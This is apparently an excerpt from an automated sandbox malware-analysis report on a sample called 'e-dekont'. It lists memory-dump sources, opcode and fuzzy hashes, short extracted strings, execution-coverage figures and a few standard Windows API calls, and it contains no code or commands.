                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfa14046278cc3c81c654445f1789b81de1014984df1dd81d9d66a19ba04192f
                                                        • Instruction ID: ce2d7cc6ff281894af5ca4245b35bf1771b7a08cee3c5e06074cd99ec9650e1c
                                                        • Opcode Fuzzy Hash: bfa14046278cc3c81c654445f1789b81de1014984df1dd81d9d66a19ba04192f
                                                        • Instruction Fuzzy Hash: 235149B0E1630ACFDB08CFA6E5455EEBBB3EF89350F10942AE505E7254D7345A428F54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 415658c4ee67e05d3f5755e906e1ba3da18980989c53971a5982846f8162f1d1
                                                        • Instruction ID: 3d998c5adca2879d8052a77b55fc59c30713371fd9208dc84d6768f59121f6c8
                                                        • Opcode Fuzzy Hash: 415658c4ee67e05d3f5755e906e1ba3da18980989c53971a5982846f8162f1d1
                                                        • Instruction Fuzzy Hash: CD5137B0E1620ADFDB08CFA6E4456EEBBF3AF89350F10942AE509E7254D7345A418F94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 817e395d8509f8293b86f080fe654adde88cd2f76a82fd2b7e30dc5ab09e1df3
                                                        • Instruction ID: a09c0ea6fd9ab1c8519d758f7412f5b491f77f37233cccf9b71983e3c3a3043c
                                                        • Opcode Fuzzy Hash: 817e395d8509f8293b86f080fe654adde88cd2f76a82fd2b7e30dc5ab09e1df3
                                                        • Instruction Fuzzy Hash: 6241E4B0E1020ADBDB08CFAAC4815AEFBB6FF88340F14D52AD959E7210D7349A418F54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:11.3%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:1.8%
                                                        Total number of Nodes:167
                                                        Total number of Limit Nodes:17

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: 36a196c00c9e53fbc9c3818547de47ea4be590221620d00796d31bc10b45fc61
                                                        • Instruction ID: c7f692ba1a5eb0cb1ad94a91729d8686e901062d27e18f8e14b622470e0ae161
                                                        • Opcode Fuzzy Hash: 36a196c00c9e53fbc9c3818547de47ea4be590221620d00796d31bc10b45fc61
                                                        • Instruction Fuzzy Hash: AEE1E874A04659CFDB14CFA9C985A9DBBB1FF48308F25806AE819AB361DB30EC41CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: 180c31410440dfeb73506c31c1006ac0e0aacadf4119dcd739e459d48f1fda04
                                                        • Instruction ID: 85db2e7b80bb7a1e711828a0e87da31e287b1b4fe60dbf0fa8ca4259bfdb879e
                                                        • Opcode Fuzzy Hash: 180c31410440dfeb73506c31c1006ac0e0aacadf4119dcd739e459d48f1fda04
                                                        • Instruction Fuzzy Hash: A681B674E10219DFDB18DFA9D994A9DBBF2BF88300F24806AE509AB365DB349D41CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: e7c601bc64f7f730af2c6776255cb76d5ba38d317893df025c52bc28c2410fc1
                                                        • Instruction ID: 9507adaada7a17cefa850bf329af8b4cb2100281b37e456587059c05d1ad2233
                                                        • Opcode Fuzzy Hash: e7c601bc64f7f730af2c6776255cb76d5ba38d317893df025c52bc28c2410fc1
                                                        • Instruction Fuzzy Hash: E981C574E10249DFDB14DFA9D984A9DBBF2BF88300F24D06AE509AB365DB349841CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: 67b59375ce7875dde472d94b900da595965336843121ecf8b54be133843968a1
                                                        • Instruction ID: 7afa863be38fb570ac8315ddb0ee5711671c66fe6ff84d3a788217334b68ac7d
                                                        • Opcode Fuzzy Hash: 67b59375ce7875dde472d94b900da595965336843121ecf8b54be133843968a1
                                                        • Instruction Fuzzy Hash: AD81B774E00209DFDB14DFAAD994A9DBBF2BF88310F24C06AE509AB365DB349941CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: afe4d13357ac5989702cf8d2cac22e6a0a249d8923294c5db960ce819bb56d12
                                                        • Instruction ID: 670b5102e10e49106b2c064cf02c8886348c59845c37cd4044a56f81d6653bc8
                                                        • Opcode Fuzzy Hash: afe4d13357ac5989702cf8d2cac22e6a0a249d8923294c5db960ce819bb56d12
                                                        • Instruction Fuzzy Hash: A081A874E00219DFDB54DFA9D984A9DBBF2BF88304F24806AD409AB365DB359941CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: e0c65be0b6ed0a5cbe7358021647c5027f72340fc186b50ad4cb3af48161790f
                                                        • Instruction ID: 2db4f2308d91505b316c121c249505502f56495e6f2c4cb2dc7da5a88d092cb6
                                                        • Opcode Fuzzy Hash: e0c65be0b6ed0a5cbe7358021647c5027f72340fc186b50ad4cb3af48161790f
                                                        • Instruction Fuzzy Hash: 8681A374E10209DFDB14DFAAD994A9DBBF2BF88300F24C06AE549AB365DB349941CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: 1f0487fb097c9c0baa1c4535dcc1be6a77c441292897899739d8095c4b224efb
                                                        • Instruction ID: cd072ec6b87757c98ad8852ba9a0aec6fd1d9ef68025b8e7a86bb7297bf8c984
                                                        • Opcode Fuzzy Hash: 1f0487fb097c9c0baa1c4535dcc1be6a77c441292897899739d8095c4b224efb
                                                        • Instruction Fuzzy Hash: 9A81A674E00219DFDB54DFA9D994A9DBBF2BF88300F24C069E809AB365DB349981CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: d0cc945e032e86d8919f3071043e1320e242fe234c1bd6ef291c8c3c0a6cb4aa
                                                        • Instruction ID: e398b4f9a9e497ad664ec23692ad53f0a5dd32e9b6c98bf36628a3b5a58c179f
                                                        • Opcode Fuzzy Hash: d0cc945e032e86d8919f3071043e1320e242fe234c1bd6ef291c8c3c0a6cb4aa
                                                        • Instruction Fuzzy Hash: 9A81B774E002199FDB54DFA9D984A9DBBF2BF88300F24C06AE809AB365DB349D41CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$(o^q$,bq$,bq
                                                        • API String ID: 0-879173519
                                                        • Opcode ID: b80aeeb17a01478440f7d49452b7acd53a231698961b99c2055f03082b569cce
                                                        • Instruction ID: 5e412e3ab7e63c84ee2f7a74a34469c63985df7a05e51e505231543ac3ef69f9
                                                        • Opcode Fuzzy Hash: b80aeeb17a01478440f7d49452b7acd53a231698961b99c2055f03082b569cce
                                                        • Instruction Fuzzy Hash: 98020B71A0011ADFCB14DF69C984AADBBFAFF88304F258469E455AB3A1D730DD45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$PH^q$PH^q
                                                        • API String ID: 0-4194141968
                                                        • Opcode ID: bbafb0da93ab1fb43fe553a5a2f97649bf68f7ec462f80401da900d143d9deee
                                                        • Instruction ID: 678322c3a62f84d28baa114d290dc86c7a662a482f114dd2310e8e37d370ce69
                                                        • Opcode Fuzzy Hash: bbafb0da93ab1fb43fe553a5a2f97649bf68f7ec462f80401da900d143d9deee
                                                        • Instruction Fuzzy Hash: 9161C874E006499FDB18DFAAD984A9DBBF2FF88304F24C06AD815AB365DB349841CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$4'^q
                                                        • API String ID: 0-273632683
                                                        • Opcode ID: 6425d4c403c77543ea64474012f7e56f1d849e1e3f39d12950e9ef306c880071
                                                        • Instruction ID: 0f1e0da6013db3e6efae1dbbd55d72e48c05c35eb26464b394f9409388eef7ff
                                                        • Opcode Fuzzy Hash: 6425d4c403c77543ea64474012f7e56f1d849e1e3f39d12950e9ef306c880071
                                                        • Instruction Fuzzy Hash: 9E72AC70A0021ADFCB15CFA8C994AAEBBF2FF89310F258559E8459B3A5D731EC51CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$Hbq
                                                        • API String ID: 0-662517225
                                                        • Opcode ID: a04f122cd77895e6043fc6830124a7da424839e8f07b43c577efaf454eafdfb8
                                                        • Instruction ID: 391f55ae6d2c525a007f43f8eb13240852c56ea61e8a50b79f170fd7cac50099
                                                        • Opcode Fuzzy Hash: a04f122cd77895e6043fc6830124a7da424839e8f07b43c577efaf454eafdfb8
                                                        • Instruction Fuzzy Hash: 49128C70A0021A8FDB14DF69C894AAEBBFABFC8304F24856DE5459B395DB34DC41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q$PH^q
                                                        • API String ID: 0-1598597984
                                                        • Opcode ID: f367fcc40e0bc7eae142a4df1c1e62d98fbe3d60324c004369a30c9994ba9237
                                                        • Instruction ID: 3df0314322802e0f16e4968e501e29af2e3f37bca2b3e4e149b2a36a3f20242f
                                                        • Opcode Fuzzy Hash: f367fcc40e0bc7eae142a4df1c1e62d98fbe3d60324c004369a30c9994ba9237
                                                        • Instruction Fuzzy Hash: 5881E274E04218CFEB58CFAAD9947EDBBF2BF89300F20916AD409AB295DB345945CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce5096e68e74a07685b74dc67a1699c8dcddf608247dbb2fe85c62c409ac18a7
                                                        • Instruction ID: a5073c7692d940b8571b93681ec9678a9c88fbfb54476793e499f0fbd5f3e8c5
                                                        • Opcode Fuzzy Hash: ce5096e68e74a07685b74dc67a1699c8dcddf608247dbb2fe85c62c409ac18a7
                                                        • Instruction Fuzzy Hash: 16F1F474E01218DFDB24DFA9D884B9DBBB2BF88304F14C1A9E408AB355DB75A985CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 33089aad69faadcea4950514c90d1b58f979e79f0c870124b1f55ad99cb2f14c
                                                        • Instruction ID: 63ccf5863897cd160574f925411d610fa05d5f36fb08f9a48ef2b30627f2cd69
                                                        • Opcode Fuzzy Hash: 33089aad69faadcea4950514c90d1b58f979e79f0c870124b1f55ad99cb2f14c
                                                        • Instruction Fuzzy Hash: A84168B4A052089BDB14CF99D484ADDFBB2FF88300F24D168E5086B381CB31A986DF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3a49e2b56aab27d6bbed474c023ad76c99cdfa458b785a2b43beeee35fcd347
                                                        • Instruction ID: b52e489da9555a41b5b0b3ca54eaa5e891ec6cd04ec28bd9f76060cc99ff8111
                                                        • Opcode Fuzzy Hash: d3a49e2b56aab27d6bbed474c023ad76c99cdfa458b785a2b43beeee35fcd347
                                                        • Instruction Fuzzy Hash: 11826C74E012288FDB64DF69C998BDDBBB2BB89300F1481EA940DA7365DB355E85CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 63e5b7fbd35411cc3a799d5dad6ec9bde457cc1d37363d944271f7ef5d2194e2
                                                        • Instruction ID: 0d8a61f7eec98b769fa6bac3dfb7cccce033257f7dbf9220ae7b3201bf274999
                                                        • Opcode Fuzzy Hash: 63e5b7fbd35411cc3a799d5dad6ec9bde457cc1d37363d944271f7ef5d2194e2
                                                        • Instruction Fuzzy Hash: C3E1B174E01218CFEB64DFA5C954B9DBBB2BF89304F2081AAD409AB394DB355E85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77158af645d33f579d03f32ad9e6f64b623abfdb2d150c50d3585dfde74bf9cb
                                                        • Instruction ID: 2f65c168d9b2d7b8b993b2aaf6fe5ba9fda002eb74efd71c16c26aef7662dce1
                                                        • Opcode Fuzzy Hash: 77158af645d33f579d03f32ad9e6f64b623abfdb2d150c50d3585dfde74bf9cb
                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                        • API String ID: 0-1932283790
                                                        • Opcode ID: 338dfe942fb15933dd60b1881636e47794d86d54eb3f2663f41c6a067feb3b65
                                                        • Instruction ID: 9eb82ae387585287ded1ba89c0fe179e43cd01925b5fc13bb601e0d8e26a72c2
                                                        • Opcode Fuzzy Hash: 338dfe942fb15933dd60b1881636e47794d86d54eb3f2663f41c6a067feb3b65
                                                        • Instruction Fuzzy Hash: FF123830A0020A8FDB15CF69D984A9EFBF6BF88314F248599E8599B365D730EC41CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 06C24BE6
                                                        • GetCurrentThread.KERNEL32 ref: 06C24C23
                                                        • GetCurrentProcess.KERNEL32 ref: 06C24C60
                                                        • GetCurrentThreadId.KERNEL32 ref: 06C24CB9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 8dd56f4769cfbb4aad943f7b108a083594d4d68c37a825cfe2f7e5c401a9a27b
                                                        • Instruction ID: 63bbd1ae9ddbe47dec84a46af10e1f0c1ec41737a7777b43b4fd42d397e5b4f3
                                                        • Opcode Fuzzy Hash: 8dd56f4769cfbb4aad943f7b108a083594d4d68c37a825cfe2f7e5c401a9a27b
                                                        • Instruction Fuzzy Hash: 8B5165B4900249CFDB58EFAAD948B9EBBF1EB88314F20C459E409A7360CB355984CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 06C24BE6
                                                        • GetCurrentThread.KERNEL32 ref: 06C24C23
                                                        • GetCurrentProcess.KERNEL32 ref: 06C24C60
                                                        • GetCurrentThreadId.KERNEL32 ref: 06C24CB9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: fe8b627200b67f338ce35b5ba84963592199d2548e54e2f9b853de0eff2a3143
                                                        • Instruction ID: d7f145f33288a9166ad765f0521ce9592ca9fff1be17ec7fc025b96f3a42973d
                                                        • Opcode Fuzzy Hash: fe8b627200b67f338ce35b5ba84963592199d2548e54e2f9b853de0eff2a3143
                                                        • Instruction Fuzzy Hash: 2F5146B4900209CFDB54EFAAD948B9EBBF1EB88314F20C459E419A7360DB359944CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xbq$Xbq$Xbq$Xbq
                                                        • API String ID: 0-2732225958
                                                        • Opcode ID: 00c84c07657ebe94111d559d647e02cf97e4d969d055b95fe18bc38b462335ad
                                                        • Instruction ID: e944d4e3e264150964ec33ede7e7869b546215639bd658c65f356ca2191f550d
                                                        • Opcode Fuzzy Hash: 00c84c07657ebe94111d559d647e02cf97e4d969d055b95fe18bc38b462335ad
                                                        • Instruction Fuzzy Hash: 87029D34810A6A8FCB014FB88968299FBB0FFAF310F15C9E9D8895E256DF7159C6C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: 108c067d16c39e908a119abb9104de85f63d13fab48621c2f17ecdc86993d188
                                                        • Instruction ID: 088dc6680c5b11e7ca8d0b298fb03b2a8f0aca818d7a2a9eb7fdb248235ed3ba
                                                        • Opcode Fuzzy Hash: 108c067d16c39e908a119abb9104de85f63d13fab48621c2f17ecdc86993d188
                                                        • Instruction Fuzzy Hash: 77524474A00219CFEB159BA4C864BAEBB76FF94300F1091AEC10AAB3A5CF355D85DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q
                                                        • API String ID: 0-2697143702
                                                        • Opcode ID: 26572d2fda2e1cdac432cd3608d2c91859b995561ca82a8f967c314b6ed777fc
                                                        • Instruction ID: 71548e447bf3c5a2f567096338a95281da56d09154d16bbdfed37892ab955e92
                                                        • Opcode Fuzzy Hash: 26572d2fda2e1cdac432cd3608d2c91859b995561ca82a8f967c314b6ed777fc
                                                        • Instruction Fuzzy Hash: 35B181707052038FDB1A9E28CA58F3977A6EF85644F2404AEE146CF3A1EF25CC42E742
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$Hbq
                                                        • API String ID: 0-4258043069
                                                        • Opcode ID: 265269324a8064695c2ceeba0bd0f75dc1f2fa3bba035530bfaa508edbdbf891
                                                        • Instruction ID: 9a00f2452ecd1a7ab44402bfb89dd20b6bfe0b4074ebf508ef67b4f14fe20497
                                                        • Opcode Fuzzy Hash: 265269324a8064695c2ceeba0bd0f75dc1f2fa3bba035530bfaa508edbdbf891
                                                        • Instruction Fuzzy Hash: CD91CF34704246CFCB15AF28D894B6E7BA6BF88314F24886DE8469B395DF34EC51CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q$LR^q
                                                        • API String ID: 0-4089051495
                                                        • Opcode ID: cd6ef792f1a65734c5a92a718d46cdfae3cea58647d1cc00045ccba8a0d9de66
                                                        • Instruction ID: 48234914ac4e229fe8f4af6173dfbd48fe446221e40c06836538aea7499f99aa
                                                        • Opcode Fuzzy Hash: cd6ef792f1a65734c5a92a718d46cdfae3cea58647d1cc00045ccba8a0d9de66
                                                        • Instruction Fuzzy Hash: 2081B135B001058FEB58DF79C85896E77B6FF88614B2185AAE405DB3A1DB34DE02CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,bq$,bq
                                                        • API String ID: 0-2699258169
                                                        • Opcode ID: a300a04cbe2a78c1224056768ad5cb2ff151fd11dc81dc165bf268e87597e328
                                                        • Instruction ID: 841ff731a17377bcfa4ffcd774c491a78156ea87afc319c62e87863d2cf7f11d
                                                        • Opcode Fuzzy Hash: a300a04cbe2a78c1224056768ad5cb2ff151fd11dc81dc165bf268e87597e328
                                                        • Instruction Fuzzy Hash: F6818074A00206CFCB14DF69E888AAAB7F6BF89214BA5816DD415EB365DB31FC41CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (&^q$(bq
                                                        • API String ID: 0-1294341849
                                                        • Opcode ID: 997231663acbc0beb4cb362dc59ef998f2e3a93587117ec0f77bd73ac4b96dd1
